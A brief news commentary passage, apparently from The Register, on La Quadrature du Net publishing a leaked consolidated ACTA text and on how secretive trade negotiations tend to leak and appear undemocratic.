La Quadrature du Net published online a consolidated version of the ACTA text, containing a full copy of the deal as it stood on 18 January, 2010. The problem is that most organisations leak, and the harder you try to keep something secret the greater the pressure to reveal. The only difference is that if you keep the wraps on for too long, not only will your secrets always eventually spill, but you end up looking sneaky and undemocratic as well. Pirate Party storms out of uber-secret ACTA negotiations ? The Register